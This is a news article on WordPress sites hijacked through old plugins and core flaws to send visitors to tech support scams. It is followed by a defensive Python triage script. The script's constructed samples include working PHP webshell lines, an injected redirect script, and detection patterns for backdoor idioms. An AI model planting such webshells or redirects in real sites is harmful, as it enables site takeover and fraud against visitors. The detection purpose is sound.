Couldn't give a fsck about patching? Well, that's your WordPress website pwned, then
Fiends use vulns to lure victims into tech support scams
Website admins are urged to update their WordPress installations as soon as possible to the latest version following a rash of attacks exploiting known vulnerabilities in the web publishing software.
Researchers at Malwarebytes say miscreants don't appear to be targeting any one specific bug, but rather a full array of flaws in older versions of WordPress and its various plugins.
"During the past few days, our crawlers have been catching a larger-than-usual number of WordPress sites being hijacked," noted Malwarebytes researcher Jérôme Segura on Thursday.
"One of the most visible client-side payloads we see are redirections to tech support scam pages. Digging deeper, we found that this is part of a series of attacks that have compromised thousands of WordPress sites since early September."
Once injected, the code runs in visitors' browsers whenever the compromised site is loaded and redirects them to scam pages, most notably fake tech support sites and hard-to-dismiss "evil cursor" scareware screens.
"Website owners affected by these attacks will have to perform a thorough cleanup of injected pages, databases, and backdoors," Segura explained.
"More importantly, they will need to identify the root cause of the compromise, which often times is an outdated WordPress installation or plugin."
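As an added example (not code from Malwarebytes, Segura or this article), here is a Python triage script for the cleanup Segura describes: it looks for injected client-side payloads of the redirect kind in post HTML such as a wp_posts dump, flags classic PHP backdoor constructs in files on disk, and compares plugin header versions against a responder-supplied list of current releases to point at the likely root cause. It goes a little beyond the redirect case by also flagging obfuscated inline scripts and several webshell idioms. The site host, file paths, plugin names, sample content and "latest version" table are all constructed for illustration.

```python
"""Triage helpers for a WordPress compromise of the kind described above: injected
client-side redirects in post HTML, PHP backdoors on disk, and the outdated plugin
that usually let the attacker in. Every host, path and file body below is
constructed for this example."""
import re
from urllib.parse import urlparse

SITE_HOST = "example.com"  # the legitimate site (constructed)
ALLOWED_SCRIPT_HOSTS = {SITE_HOST, "www." + SITE_HOST}

# --- 1. injected client-side payloads in page/post HTML (e.g. a wp_posts dump) ---
SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)
REDIRECT_RE = re.compile(r"(?:window\.|document\.|top\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]", re.I)
OBFUSCATION_RE = re.compile(r"fromCharCode|unescape\(|atob\(|\\x[0-9a-f]{2}", re.I)

def find_injected_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (reason, evidence) pairs for script tags that look injected."""
    findings = []
    for attrs, body in SCRIPT_TAG_RE.findall(html):
        src = SRC_ATTR_RE.search(attrs)
        if src:
            # A relative path has no host; a script pulled from a foreign host is suspect.
            host = urlparse(src.group(1), scheme="https").hostname
            if host and host.lower() not in allowed_hosts:
                findings.append(("external script src", src.group(1)))
        elif REDIRECT_RE.search(body):
            findings.append(("inline redirect", body.strip()[:80]))
        elif OBFUSCATION_RE.search(body):
            findings.append(("obfuscated inline script", body.strip()[:80]))
    return findings

# --- 2. PHP backdoors on disk -----------------------------------------------------
# Line-oriented heuristics: a payload split across lines or assembled by string
# concatenation slips past them, so a clean run is triage, not proof of a clean site.
PHP_BACKDOOR_PATTERNS = {
    "eval of decoded payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\(", re.I),
    "eval/assert of request data": re.compile(r"(?:eval|assert)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "preg_replace with /e modifier": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    "variable function on request data": re.compile(r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
}

def find_php_backdoors(php_files):
    """php_files: {path: source}. Returns (path, line_no, pattern_name) for each hit."""
    hits = []
    for path, source in php_files.items():
        for line_no, line in enumerate(source.splitlines(), 1):
            for name, rx in PHP_BACKDOOR_PATTERNS.items():
                if rx.search(line):
                    hits.append((path, line_no, name))
    return hits

# --- 3. root cause: plugins behind the current release ----------------------------
VERSION_HEADER_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][\w.\-]*)", re.I | re.M)

def parse_version(version):
    """Compare numerically: as plain strings '4.9.8' would sort after '4.9.10'."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", version))

def outdated_plugins(plugin_files, latest_versions):
    """plugin_files: {slug: main plugin file source (WordPress plugin header)};
    latest_versions: {slug: version} as looked up by the responder.
    Returns {slug: (installed, latest)} for every plugin that is behind."""
    out = {}
    for slug, source in plugin_files.items():
        match = VERSION_HEADER_RE.search(source)
        if match and slug in latest_versions:
            installed = match.group(1)
            if parse_version(installed) < parse_version(latest_versions[slug]):
                out[slug] = (installed, latest_versions[slug])
    return out

# Constructed sample input: one post body, three PHP files, two plugin headers.
SAMPLE_POST_HTML = """<p>Welcome to our shop.</p>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.evil-redirector.example/lib.js"></script>
<script>setTimeout(function(){ window.location.href = "https://support-alert.example/"; }, 500);</script>"""
SAMPLE_PHP_FILES = {
    "wp-content/uploads/2018/09/cache.php": "<?php\n@eval(base64_decode($_POST['c']));\n",
    "wp-content/themes/shop-theme/footer.php":
        "<?php\nif (isset($_COOKIE['k'])) { $f = $_COOKIE['k']; $f($_REQUEST['d']); }\n",
    "wp-content/plugins/good-plugin/good-plugin.php": "<?php\n/*\nPlugin Name: Good Plugin\nVersion: 1.2.3\n*/\n",
}
SAMPLE_PLUGINS = {
    "good-plugin": SAMPLE_PHP_FILES["wp-content/plugins/good-plugin/good-plugin.php"],
    "gallery-widget": "<?php\n/*\nPlugin Name: Gallery Widget\nVersion: 2.4.10\n*/\n",
}
KNOWN_LATEST = {"good-plugin": "1.3.0", "gallery-widget": "2.4.10"}  # responder-supplied (constructed)

if __name__ == "__main__":
    for finding in find_injected_scripts(SAMPLE_POST_HTML):
        print("injected script:", *finding)
    for hit in find_php_backdoors(SAMPLE_PHP_FILES):
        print("backdoor pattern:", *hit)
    for slug, (have, want) in outdated_plugins(SAMPLE_PLUGINS, KNOWN_LATEST).items():
        print(f"outdated plugin: {slug} {have} -> {want}")
```

Run against the constructed input, the script reports the foreign script host and the inline redirect, the two webshell lines, and the plugin that is one minor release behind. Two practical points the code encodes: version strings must be compared as numeric tuples (a string comparison would call 4.9.8 newer than 4.9.10), and regex hits are only a starting point; the actual cleanup still means diffing core and plugin files against a pristine copy of the same versions and restoring the database from a backup that predates the injection.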
WordPress is no stranger to large-scale attacks. The widely used CMS is an attractive target for cybercriminals: a vulnerability in the core software or in one of its many plugins typically gives an attacker a way to quietly take over a site and inject code that is then served to every visitor, as with the redirects seen here.
Earlier this year, rival CMS Drupal took its turn in the shooting gallery as attackers seized on a bug known as 'Drupalgeddon' to inject things like cryptocoin-mining scripts into pages. ®